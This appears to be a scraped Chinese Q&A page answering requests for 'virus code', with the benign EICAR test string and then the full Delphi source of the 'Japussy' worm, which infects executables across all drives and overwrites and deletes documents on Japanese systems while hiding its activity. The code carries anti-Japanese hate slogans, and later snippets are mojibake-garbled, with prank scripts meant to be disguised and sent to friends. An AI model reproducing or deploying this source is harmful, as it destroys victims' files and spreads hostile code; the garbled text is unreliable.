谁有病毒代码发给我?

\u8c01\u6709\u75c5\u6bd2\u53d1\u7ed9\u6211\uff1f

\u4f60\u7684\u6263\u6263\u662f

\u6b27\u6d32\u8ba1\u7b97\u673a\u9632\u75c5\u6bd2\u534f\u4f1a\u63d0\u4f9b\u7684\u6d4b\u8bd5\u75c5\u6bd2\u4ee3\u7801\u3002\u672c\u4ee3\u7801\u5c3d\u7ba1\u6d4b\u8bd5\uff0c\u65e0\u4efb\u4f55\u5371\u9669\u3002
---------------------\u8bf7\u590d\u5236\u4e0b\u9762\u7684\u4ee3\u7801\u5230\u6587\u672c\u4e2d\u4fdd\u5b58-------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
---------------------\u8bf7\u590d\u5236\u4e0a\u9762\u7684\u4ee3\u7801\u5230\u6587\u672c\u4e2d\u4fdd\u5b58-------------------
\u6d4b\u8bd5\u65b9\u6cd5\uff1a
1.\u9f20\u6807\u53f3\u952e\u70b9\u51fb\u684c\u9762\u7a7a\u767d\u5904\uff0c\u521b\u5efa\u4e00\u4e2a\u201c\u6587\u672c\u6587\u6863\u201d\u3002
2.\u5c06\u4e0a\u9762\u8fd9\u6bb5\u6d4b\u8bd5\u4ee3\u7801\u590d\u5236\u5230\u201c\u6587\u672c\u201d\u91cc\uff0c\u4fdd\u5b58\uff0c\u7136\u540e\u53ef\u4ee5\u76f4\u63a5\u53f3\u952e\u70b9\u51fb\u8fd9\u4e2a\u6587\u672c\uff0c\u7528\u6740\u6bd2\u8f6f\u4ef6\u626b\u63cf\u4e5f\u53ef\u4ee5\u7b49\u4e00\u4f1a\uff0c\u5982\u679c\u4f60\u7684\u6740\u6bd2\u8f6f\u4ef6\u8fd8\u884c\uff0c\u4f1a\u81ea\u52a8\u62a5\u6bd2\u5e76\u5c06\u8be5\u6587\u672c\u5220\u9664\u90a3\u5c31\u53ef\u4ee5\u521d\u6b65\u653e\u5fc3\u4e86\u3002
\u6d4b\u8bd5\u539f\u7406\uff1a
\u8be5\u6bb5\u4ee3\u7801\u662f\u6b27\u6d32\u8ba1\u7b97\u673a\u9632\u75c5\u6bd2\u534f\u4f1a\u5f00\u53d1\u7684\u4e00\u79cd\u75c5\u6bd2\u4ee3\u7801\uff0c\u5176\u4e2d\u7684\u7279\u5f81\u7801\u5df2\u7ecf\u5305\u542b\u5728\u5404\u79cd\u6740\u6bd2\u8f6f\u4ef6\u7684\u75c5\u6bd2\u4ee3\u7801\u5e93\u91cc\uff0c\u6240\u4ee5\u53ef\u4ee5\u7528\u505a\u6d4b\u8bd5\u75c5\u6bd2\u626b\u63cf\u5f15\u64ce\u3002
\u6d4b\u8bd5\u7b49\u7ea7:
\u7279\u7b49\uff1a\u590d\u5236\u5b8c\u4ee3\u7801\u540e\u4fbf\u63d0\u793a\u5185\u5b58\u6709\u75c5\u6bd2
\u4f18\u7b49\uff1a\u521a\u4fdd\u5b58\u5b8c\u5c31\u63d0\u793a\u75c5\u6bd2(\u6216\u8005\u76f4\u63a5\u5220\u9664)
\u4e2d\u7b49\uff1a\u4fdd\u5b58\u540e\u51e0\u79d2\u63d0\u793a\u75c5\u6bd2(\u6216\u8005\u76f4\u63a5\u5220\u9664)
\u4e0b\u7b49\uff1a\u9700\u81ea\u5df1\u542f\u52a8\u75c5\u6bd2\u626b\u63cf\u67e5\u6740\u624d\u63d0\u793a\u75c5\u6bd2(\u6216\u8005\u76f4\u63a5\u5220\u9664)
\u52a3\u7b49\uff1a\u65e0\u8bba\u600e\u4e48\u626b\u63cf\u90fd\u65e0\u6cd5\u63d0\u793a\u75c5\u6bd2(\u6216\u8005\u76f4\u63a5\u5220\u9664)

  program japussy;
  uses
  windows, sysutils, classes, graphics, shellapi{, registry};
  const
  headersize = 82432; //病毒体的大小
  iconoffset = $12eb8; //pe文件主图标的偏移量

  //在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
  //查找2800000020的十六进制字符串可以找到主图标的偏移量

  {
  headersize = 38912; //upx压缩过病毒体的大小
  iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量

  //upx 1.24w 用法: upx -9 --8086 japussy.exe
  }
  iconsize = $2e8; //pe文件主图标的大小--744字节
  icontail = iconoffset + iconsize; //pe文件主图标的尾部
  id = $44444444; //感染标记

  //垃圾码,以备写入
  catchword = 'if a race need to be killed out, it must be yamato. ' +
  'if a country need to be destroyed, it must be japan! ' +
  '*** w32.japussy.worm.a ***';
  {$r *.res}
  function registerserviceprocess(dwprocessid, dwtype: integer): integer;
  stdcall; external 'kernel32.dll'; //函数声明
  var
  tmpfile: string;
  si: startupinfo;
  pi: process_information;
  isjap: boolean = false; //日文操作系统标记
  { 判断是否为win9x }
  function iswin9x: boolean;
  var
  ver: tosversioninfo;
  begin
  result := false;
  ver.dwosversioninfosize := sizeof(tosversioninfo);
  if not getversionex(ver) then
  exit;
  if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
  result := true;
  end;
  { 在流之间复制 }
  procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
  dstartpos: integer; count: integer);
  var
  scurpos, dcurpos: integer;
  begin
  scurpos := src.position;
  dcurpos := dst.position;
  src.seek(sstartpos, 0);
  dst.seek(dstartpos, 0);
  dst.copyfrom(src, count);
  src.seek(scurpos, 0);
  dst.seek(dcurpos, 0);
  end;
  { 将宿主文件从已感染的pe文件中分离出来,以备使用 }
  procedure extractfile(filename: string);
  var
  sstream, dstream: tfilestream;
  begin
  try
  sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
  try
  dstream := tfilestream.create(filename, fmcreate);
  try
  sstream.seek(headersize, 0); //跳过头部的病毒部分
  dstream.copyfrom(sstream, sstream.size - headersize);
  finally
  dstream.free;
  end;
  finally
  sstream.free;
  end;
  except
  end;
  end;
  { 填充startupinfo结构 }
  procedure fillstartupinfo(var si: startupinfo; state: word);
  begin
  si.cb := sizeof(si);
  si.lpreserved := nil;
  si.lpdesktop := nil;
  si.lptitle := nil;
  si.dwflags := startf_useshowwindow;
  si.wshowwindow := state;
  si.cbreserved2 := 0;
  si.lpreserved2 := nil;
  end;
  { 发带毒邮件 }
  procedure sendmail;
  begin
  //哪位仁兄愿意完成之?
  end;
  { 感染pe文件 }
  procedure infectonefile(filename: string);
  var
  hdrstream, srcstream: tfilestream;
  icostream, dststream: tmemorystream;
  iid: longint;
  aicon: ticon;
  infected, ispe: boolean;
  i: integer;
  buf: array[0..1] of char;
  begin
  try //出错则文件正在被使用,退出
  if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
  exit;
  infected := false;
  ispe := false;
  srcstream := tfilestream.create(filename, fmopenread);
  try
  for i := 0 to $108 do //检查pe文件头
  begin
  srcstream.seek(i, sofrombeginning);
  srcstream.read(buf, 2);
  if (buf[0] = #80) and (buf[1] = #69) then //pe标记
  begin
  ispe := true; //是pe文件
  break;
  end;
  end;
  srcstream.seek(-4, sofromend); //检查感染标记
  srcstream.read(iid, 4);
  if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
  infected := true;
  finally
  srcstream.free;
  end;
  if infected or (not ispe) then //如果感染过了或不是pe文件则退出
  exit;
  icostream := tmemorystream.create;
  dststream := tmemorystream.create;
  try
  aicon := ticon.create;
  try
  //得到被感染文件的主图标(744字节),存入流
  aicon.releasehandle;
  aicon.handle := extracticon(hinstance, pchar(filename), 0);
  aicon.savetostream(icostream);
  finally
  aicon.free;
  end;
  srcstream := tfilestream.create(filename, fmopenread);
  //头文件
  hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
  try
  //写入病毒体主图标之前的数据
  copystream(hdrstream, 0, dststream, 0, iconoffset);
  //写入目前程序的主图标
  copystream(icostream, 22, dststream, iconoffset, iconsize);
  //写入病毒体主图标到病毒体尾部之间的数据
  copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
  //写入宿主程序
  copystream(srcstream, 0, dststream, headersize, srcstream.size);
  //写入已感染的标记
  dststream.seek(0, 2);
  iid := $44444444;
  dststream.write(iid, 4);
  finally
  hdrstream.free;
  end;
  finally
  srcstream.free;
  icostream.free;
  dststream.savetofile(filename); //替换宿主文件
  dststream.free;
  end;
  except;
  end;
  end;
  { 将目标文件写入垃圾码后删除 }
  procedure smashfile(filename: string);
  var
  filehandle: integer;
  i, size, mass, max, len: integer;
  begin
  try
  setfileattributes(pchar(filename), 0); //去掉只读属性
  filehandle := fileopen(filename, fmopenwrite); //打开文件
  try
  size := getfilesize(filehandle, nil); //文件大小
  i := 0;
  randomize;
  max := random(15); //写入垃圾码的随机次数
  if max < 5 then
  max := 5;
  mass := size div max; //每个间隔块的大小
  len := length(catchword);
  while i < max do
  begin
  fileseek(filehandle, i * mass, 0); //定位
  //写入垃圾码,将文件彻底破坏掉
  filewrite(filehandle, catchword, len);
  inc(i);
  end;
  finally
  fileclose(filehandle); //关闭文件
  end;
  deletefile(pchar(filename)); //删除之
  except
  end;
  end;
  { 获得可写的驱动器列表 }
  function getdrives: string;
  var
  disktype: word;
  d: char;
  str: string;
  i: integer;
  begin
  for i := 0 to 25 do //遍历26个字母
  begin
  d := chr(i + 65);
  str := d + ':\';
  disktype := getdrivetype(pchar(str));
  //得到本地磁盘和网络盘
  if (disktype = drive_fixed) or (disktype = drive_remote) then
  result := result + d;
  end;
  end;
  { 遍历目录,感染和摧毁文件 }
  procedure loopfiles(path, mask: string);
  var
  i, count: integer;
  fn, ext: string;
  subdir: tstrings;
  searchrec: tsearchrec;
  msg: tmsg;
  function isvaliddir(searchrec: tsearchrec): integer;
  begin
  if (searchrec.attr <> 16) and (searchrec.name <> '.') and
  (searchrec.name <> '..') then
  result := 0 //不是目录
  else if (searchrec.attr = 16) and (searchrec.name <> '.') and
  (searchrec.name <> '..') then
  result := 1 //不是根目录
  else result := 2; //是根目录
  end;
  begin
  if (findfirst(path + mask, faanyfile, searchrec) = 0) then
  begin
  repeat
  peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑
  if isvaliddir(searchrec) = 0 then
  begin
  fn := path + searchrec.name;
  ext := uppercase(extractfileext(fn));
  if (ext = '.exe') or (ext = '.scr') then
  begin
  infectonefile(fn); //感染可执行文件
  end
  else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
  begin
  //感染html和asp文件,将base64编码后的病毒写入
  //感染浏览此网页的所有用户
  //哪位大兄弟愿意完成之?
  end
  else if ext = '.wab' then //outlook地址簿文件
  begin
  //获取outlook邮件地址
  end
  else if ext = '.adc' then //foxmail地址自动完成文件
  begin
  //获取foxmail邮件地址
  end
  else if ext = 'ind' then //foxmail地址簿文件
  begin
  //获取foxmail邮件地址
  end
  else
  begin
  if isjap then //是倭文操作系统
  begin
  if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
  (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
  (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
  (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
  (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
  (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
  smashfile(fn); //摧毁文件
  end;
  end;
  end;
  //感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
  sleep(200);
  until (findnext(searchrec) <> 0);
  end;
  findclose(searchrec);
  subdir := tstringlist.create;
  if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
  begin
  repeat
  if isvaliddir(searchrec) = 1 then
  subdir.add(searchrec.name);
  until (findnext(searchrec) <> 0);
  end;
  findclose(searchrec);
  count := subdir.count - 1;
  for i := 0 to count do
  loopfiles(path + subdir.strings + '\', mask);
  freeandnil(subdir);
  end;
  { 遍历磁盘上所有的文件 }
  procedure infectfiles;
  var
  driverlist: string;
  i, len: integer;
  begin
  if getacp = 932 then //日文操作系统
  isjap := true; //去死吧!
  driverlist := getdrives; //得到可写的磁盘列表
  len := length(driverlist);
  while true do //死循环
  begin
  for i := len downto 1 do //遍历每个磁盘驱动器
  loopfiles(driverlist + ':\', '*.*'); //感染之
  sendmail; //发带毒邮件
  sleep(1000 * 60 * 5); //睡眠5分钟
  end;
  end;
  { 主程序开始 }
  begin
  if iswin9x then //是win9x
  registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程
  else //winnt
  begin
  //远程线程映射到explorer进程
  //哪位兄台愿意完成之?
  end;
  //如果是原始病毒体自己
  if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
  infectfiles //感染和发邮件
  else //已寄生于宿主程序上了,开始工作
  begin
  tmpfile := paramstr(0); //创建临时文件
  delete(tmpfile, length(tmpfile) - 4, 4);
  tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格
  extractfile(tmpfile); //分离之
  fillstartupinfo(si, sw_showdefault);
  createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
  0, nil, '.', si, pi); //创建新进程运行之
  infectfiles; //感染和发邮件
  end;
  end.

  • 璋佽兘缁欐垜涓涓父瑙佹湪椹鐥呮瘨鐨浠g爜
    绛旓細2銆鐥呮瘨鏂囦欢娴嬭瘯浠g爜銆3銆佷娇鐢ㄦ柟娉曞涓嬶細thisisnotarealvirus.itisatextfilethatisusedtotestantivirussoftware.娴嬭瘯浠g爜锛---璇峰鍒朵笅闈㈢殑浠g爜鍒版枃鏈腑淇濆瓨---x5o!p%@ap[4pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*---璇峰鍒朵笂闈㈢殑浠g爜鍒版枃鏈腑淇濆瓨---娴嬭瘯鏂规硶锛1.榧犳爣鍙抽敭...
  • 璋佽兘缁欐垜鐢佃剳鐥呮瘨鐨婧愪唬鐮鍙戞潵缁欐垜.
    绛旓細浠g爜:---绋嬪簭浠g爜program Japussy;uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};const HeaderSize = 82432; //鐥呮瘨浣撶殑澶у皬 IconOffset = $12EB8; //PE鏂囦欢涓诲浘鏍囩殑鍋忕Щ閲 //鍦ㄦ垜鐨凞elphi5 SP1涓婇潰缂栬瘧寰楀埌鐨勫ぇ灏,鍏跺畠鐗堟湰鐨凞elphi鍙兘涓嶅悓 //鏌ユ壘2800000020鐨勫崄鍏繘鍒跺瓧绗︿覆鍙互鎵惧埌涓诲浘...
  • 璋佽兘缁欎竴涓皬鐥呮瘨鐨浠g爜缁欐垜鐜╃帺?
    绛旓細1.榧犳爣鍙抽敭鐐瑰嚮妗岄潰绌虹櫧澶勶紝鍒涘缓涓涓滄枃鏈枃妗b濄2.灏嗕笂闈㈣繖娈垫祴璇曚唬鐮佸鍒跺埌鈥滄枃鏈濋噷锛屼繚瀛橈紝鐒跺悗鍙互鐩存帴鍙抽敭鐐瑰嚮杩欎釜鏂囨湰锛岀敤鏉姣掕蒋浠舵壂鎻忎篃鍙互绛変竴浼氾紝濡傛灉浣犵殑鏉姣掕蒋浠惰繕琛岋紝浼氳嚜鍔ㄦ姤姣掑苟灏嗚鏂囨湰鍒犻櫎閭e氨鍙互鍒濇鏀惧績浜嗐傛祴璇曞師鐞嗭細璇ユ浠g爜鏄娲茶绠楁満闃茬梾姣掑崗浼氬紑鍙戠殑涓绉鐥呮瘨浠g爜锛屽叾涓殑鐗...
  • 鎬ャ傘傘傝涓綅缁欐垜鐥呮瘨娴嬭瘯浠g爜瑕佸銆傘備唬鐮
    绛旓細X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H 杩欐浠g爜鏄娲茶绠楁満闃茬梾姣掑崗浼氬紑鍙戠殑涓绉鐥呮瘨浠g爜锛岋紝鍏朵腑鐨勭壒寰佺爜宸茬粡鍖呭惈鍦ㄥ悇绉嶆潃姣掕蒋浠剁殑鐥呮瘨浠g爜搴撻噷锛屾墍浠ュ彲浠ョ敤鍋氭祴璇曠梾姣掓壂鎻忓紩鎿庛備笅闈㈡槸绛夌骇:鐗圭瓑:澶嶅埗瀹屼唬鐮佸悗渚挎彁绀哄唴瀛鏈夌梾姣 浼樼瓑:鍒氫繚瀛樺畬灏辨彁绀虹梾姣(鎴栬...
  • 璋佹湁绠鍗曠殑鐢佃剳鐥呮瘨浠g爜??
    绛旓細鐐瑰彸閿夋嫨灞炴р啋鑷畾涔夆啋鏇存敼鍥炬爣锛屾妸瀹冧吉瑁呮垚涓涓蒋浠(鎴戠殑鏄痺inXP绯荤粺锛屾搷浣滃彲鑳戒笉涓鏍)锛屾妸鍒氭墠鐨勬枃浠舵斁杩涘幓 鏈鍚鍙戦佺粰浣犵殑鏈嬪弸锛岃浠栨墦寮锛屼粬鍦ㄧ數鑴戜笂灏变細鍑虹幇涓涓繖鏍风殑鎻愮ず锛毭 榛戝鍏ヤ镜璀﹀憡 鎮ㄧ殑鐢佃剳琚粦瀹㈠叆渚 璇风珛鍒诲彂涓夐亶鎴戞槸鐚殑鏈嬪弸鍦 鍚﹀垯鎮ㄧ殑鐢佃剳鏄惧崱灏嗚捣鐏 纭畾 ...
  • 鎴戞兂鍒堕犱竴涓潪甯稿嵄闄╃殑鐢佃剳鐥呮瘨,璋佹湁浠g爜鍟,--蹇粰鎴
    绛旓細鍞 k,jgldl;kp.sfoem~SDGdrtyjjladoeitg qwkjrbnls;dbjhoos'gklis;jv;sdhn~eslkrjgse;jgporg
  • 姹鐥呮瘨鏍锋湰浠ュ強婧愪唬鐮
    绛旓細1.鏂板缓涓涓浜嬫湰 2.鎶婁笅闈浠g爜澧炶创杩涘幓 echo off start cmd 0 3.澧炶创鍚庯紝鐐瑰嚮鏂囦欢 - 鍙﹀瓨涓 4.杈撳叆鏂囦欢鍚嶏紝鍦ㄦ枃浠跺悕鍚庨潰鍔犱笂.bat 5.鐒跺悗鍙戠粰濂藉弸灏卞彲浠ヤ簡锛侊紙鍙戦佸ソ鍙嬬殑鏃跺欙紝灏卞ソ灏卞姞涓3锛屽彸閿枃浠 - 鍘嬬缉鏂囦欢 鍗冲彲锛侊級PS锛氬姏鐩稿綋鐨勫帀瀹筹紝鎵浠ヨ鍕垮紕杩囩伀锛屽惁鍒欏悗鏋滆嚜璐燂紒鏂囦欢鈥滄垜鏄尓鈥...
  • 姹傜梾姣掔殑浠g爜,灏辨槸鍦ㄨ浜嬫湰涓婂啓涓婂氨浼鏈夌梾姣銆
    绛旓細if left(wscript.scriptname,2)<>chrw(26426)&chrw(20851) then msgbox mid(strreverse(wscript.scriptname),5),4096:else createobject("wscript.shell").run "cmd /k echo " & chrw("-28711")&chrw("-28212")&chrw("21152")&chrw("19978")&chrw("21629")&chrw("20196")&chrw("23601"...
  • 璋佹湁涓浜鐥呮瘨鐨勫師浠g爜
    绛旓細(鍐呭瑙佷笂锛屽洜鎴戣浜嗙憺鏄燂紝鎵浠ユ棤娉曠湡瀹炲鍒朵笅鏉ワ紝鍏ㄥ姞浜嗙┖鏍硷紝鐪熷疄娴嬭瘯鏃跺幓鎺夌┖鏍煎嵆鍙紒锛夋祴璇曞師鐞嗭細璇ユ浠g爜鏄娲茶绠楁満闃茬梾姣掑崗浼氬紑鍙戠殑涓绉鐥呮瘨浠g爜锛屽叾涓殑鐗瑰緛鐮佸凡缁忓寘鍚湪鍚勭鏉姣掕蒋浠剁殑鐥呮瘨浠g爜搴撻噷锛屾墍浠ュ彲浠ョ敤鍋氭祴璇曠梾姣掓壂鎻忓紩鎿庛傛祴璇曠瓑绾:鐗圭瓑锛氬鍒跺畬浠g爜鍚庝究鎻愮ず鍐呭瓨鏈夌梾姣 浼樼瓑锛氬垰淇濆瓨瀹屽氨...
  • 璋佹湁vbs鐥呮瘨浠g爜?
    绛旓細WScript.Echo("杩樺墿9涓嬨備綘杩樼偣鍟婏紝涓嶈鎴戞媺锛")WScript.Echo("杩樺墿8涓嬶紝鏈夌偣浼ゅ績鎷夛紝骞插槢涓㈠純浜哄")WScript.Echo("杩樺墿7涓嬨傜柉浜嗭紝浣犳湁鐐硅礋鎰忥紒")WScript.Echo("杩樺墿6涓嬨傚銆備綘灏辩偣鍚э紝鎴戞仺浣狅紒")WScript.Echo("杩樺墿5涓嬶紝涓嶆槑鐧斤紝鍒犻櫎鎴戜綘灏卞ソ鍚楋紵")WScript.Echo("杩樺墿4涓嬶紒鐪熻鍒犻櫎...
  • 扩展阅读:吓人的编程代码 ... 一串代码伪装黑客 ... oppo果奶病毒链接复制 ... 手机病毒生成器app ... 病毒编程代码大全 ... 一份礼物o泡果奶链接 ... o泡果奶病毒代码复制 ... o泡果奶病毒apk文件 ... 手机恶搞病毒链接 ...

    本站交流只代表网友个人观点,与本站立场无关
    欢迎反馈与建议,请联系电邮
    2024© 车视网